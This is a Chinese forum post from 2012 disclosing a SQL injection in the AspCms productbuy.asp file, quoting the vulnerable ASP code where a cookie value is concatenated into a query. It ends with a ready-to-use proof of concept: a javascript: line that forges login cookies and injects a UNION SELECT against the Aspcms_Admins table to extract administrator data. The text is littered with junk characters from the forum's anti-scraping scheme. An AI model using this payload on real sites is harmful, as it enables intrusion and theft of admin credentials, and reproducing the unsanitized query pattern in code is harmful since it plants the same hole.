好久没上土司了,上来一看发现在删号名单内.....
% {3 Y5 ]9 j. U- M; E* F也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。: w$ i4 p2 ]& ~, ~
废话不多说,看代码:
" |" p q; F' l) p& m3 Y- U( D$ l9 {: o4 X! F( n
<%0 w: A: z3 C1 {$ j, G, D5 C1 V
, N; o+ B z" M) E/ T( n. yif action = "buy" then
2 e+ ?$ Z, M0 ~/ ^4 B& y& y% L) ]7 S& g. ?: x
addOrder()
# V0 a$ t0 L3 }9 ?' Q
2 J; C% w+ o1 m+ t6 Z" M: u5 {else9 n+ y" X5 P0 `
* o: K! B, {3 |+ X0 v0 u! X" R echoContent()! _3 b) b- _6 j
2 Q: E2 e/ K, { x6 V: ~" }& m- [ gend if
- o% {7 ]9 H% C8 |# _' s8 Z; `& k' ]& u0 I
2 \% L3 C7 v: D1 L( _
# r. L" K9 t+ D0 k……略过& ?+ E; T' m8 Y4 B, K
- }' Y1 U9 ~, }; Z9 `+ e8 \! L
! \& k$ y: U" z9 y9 p3 {
$ S# |: ] T6 o; T# h
Sub echoContent(). }0 i- n: E% Z4 b/ V
9 C" @6 U) O3 {% u* G9 I. F
dim id0 L" g4 L/ i0 j1 ` @! O, K
, z* X3 b0 W7 a( j
id=getForm("id","get")
; @) m l! B X. e1 ~6 n4 D, K5 L' T) H( X( E8 `) [$ I7 z
# c) u( Q/ q1 i2 D8 \% z9 ]& Q7 b. ~* m
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 9 Y: A% r6 j8 |. O. v
% \6 k: ^% l& L/ w
& B g) T, q& z2 k ]! z( }. o4 ~1 C0 l, x+ J" M* P. k
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")" ^4 ~+ X2 h% T+ _3 C
" G8 i- H0 Z! Z5 [( ? dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct" L& ~7 U$ r% d. {4 b
: s0 B% ?/ q. p. i9 M4 \! x* Z Dim templatePath,tempStr1 o, e3 M. n4 |
, f) i. V9 u# [. V
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"5 h- L- O9 w, v* ?: L
# s. I; x& W( ?5 S8 b7 Q# ?$ T* k
; V, i6 W4 e) _5 @8 w
. ^' c+ c$ ^% \" U
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
1 x' H% o: q$ Z P4 l% c1 Y% V- A4 `2 _# T$ n& e
selectproduct=rsObj(0)
# l. J+ @& n% w! x! V: N
9 u0 \. Z; ^. Z4 A. i " u6 a9 `) e: A9 z9 O6 s" B: E" t- C) W
# P( n8 G q% C* E Dim linkman,gender,phone,mobile,email,qq,address,postcode3 b; B, w& |) g7 ^/ R
6 t Q: ~# ?. a0 k8 E0 m if isnul(rCookie("loginstatus")) then wCookie"loginstatus",02 K0 e4 Q$ t1 `2 L( O" z- c
5 J! u2 u H' _; G$ ^( F- a
if rCookie("loginstatus")=1 then
$ y9 p# o. n! X- o! q/ r3 q+ l" U7 o- M# S# k$ r
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")7 A3 Y+ W" `6 B: s3 `: O* Q
9 l3 M% v! k7 M/ r linkman=rsObj("truename")
; z3 A7 p6 x+ G. i( C' @ }8 ?3 S* F/ O# t/ _( e) H, M
gender=rsObj("gender")
1 |5 A) h' k' w- X1 x5 e% q. b; |1 j
phone=rsObj("phone")
+ R- @- E6 m/ n# h |; f
. _( ?$ }1 I1 r* n: }: p mobile=rsObj("mobile")5 w. I- P! `% l! U d
" U+ D4 ?) y I email=rsObj("email")9 x( U% R! h2 n0 @2 s+ W
# h' n' o8 w/ _; s* A' A
qq=rsObj("qq")
+ ~% z# u& ?7 S) b a6 N) G# P# Z4 K3 C8 N& }, @; t
address=rsObj("address")- F9 o- _6 _- T# |5 e9 [
. @5 ]: y" A, g. S6 g# c0 j
postcode=rsObj("postcode")
) I- Y% Z( ~% m/ Y0 [; y. a+ {; F# C0 ~1 \; y* S9 Z
else
* v: y# e( C* F* f+ ^& b. g- Z+ i+ _$ @5 P( C
gender=1; {' @! q5 n) N: v9 [6 x6 u* r
# [- m7 }! `" d/ j8 D4 A end if9 \4 `8 H; I! U' F
1 `3 t. `. \$ w" _6 F$ } rsObj.close()
0 D3 y$ t, T7 i* E- C8 x' P% D d- C
0 m) J( J; d7 k% l
: A$ S3 J4 f4 v0 i# [, T3 Q- Q with templateObj & X1 z0 y: L3 m! B
: ^/ m; M4 N" w" e .content=loadFile(templatePath)
: g1 _* j# X# Z X# [1 v2 D& e
0 p* K! L* o5 L# O' `6 J+ |6 { .parseHtml()
% F. v6 U0 ?) Y4 u
+ r7 ?1 K) \( w+ B .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
' X5 f! y# l. `, C$ `- o6 P G4 j0 f5 r9 \
.content=replaceStr(.content,"[aspcms:linkman]",linkman) 0 B/ p( ~2 X: U# [% n# |
# ~% b, n+ N I# z
.content=replaceStr(.content,"[aspcms:gender]",gender)
3 j( {; @; B4 ]& t$ A/ N/ h: f: ~3 H5 o, S; `5 E
.content=replaceStr(.content,"[aspcms:phone]",phone) ( o; @: s+ Q4 T; z2 W- O# R
* @6 V+ S, q% M .content=replaceStr(.content,"[aspcms:mobile]",mobile) 8 [. C3 c- f. k. |4 N7 J) ~$ c4 P, c
; |$ O& R0 T9 M' m
.content=replaceStr(.content,"[aspcms:email]",email) 6 V6 t& K0 H0 m
2 S1 r. Z. n X+ p3 D .content=replaceStr(.content,"[aspcms:qq]",qq)
3 K3 p, [: o* H# m* o3 G6 s
, M* O3 Z0 S1 G6 {6 b! j ?/ H2 n .content=replaceStr(.content,"[aspcms:address]",address)
# G. m( Q( D1 k) c `- E; a! O5 ?! p1 j& _" S8 E
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
# R5 F4 e8 z8 P R; J! q% y( @9 |' q4 Z `; S( L: u* {2 _
.parseCommon()
0 M! n6 V; i( T1 ]7 N( b' X) j& F0 j& a$ N0 J9 S
echo .content % r; s! o' h/ G) j' G8 l7 J
) b$ E' R' l: l1 Y+ q6 z end with
0 a" _0 v8 s8 W% L1 u# x4 j- U+ W% ^) D# ~) e( z! h
set templateobj =nothing : terminateAllObjects
M: X' K: z8 O' } l; e( q& l( S) c4 P5 G
n" N& b9 o% }$ [End Sub
$ E: m+ x+ p, W5 A漏洞很明显,没啥好说的5 c4 j2 {4 T: J+ J
poc:
" k) f* o" E u4 }
: g9 ^) `7 j0 A k. |: `javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
1 v& J `5 _9 j( d- A r. R3 e% h, b) j$ Q# t
|
发表于 2012-12-27 08:35:05
收藏
支持
反对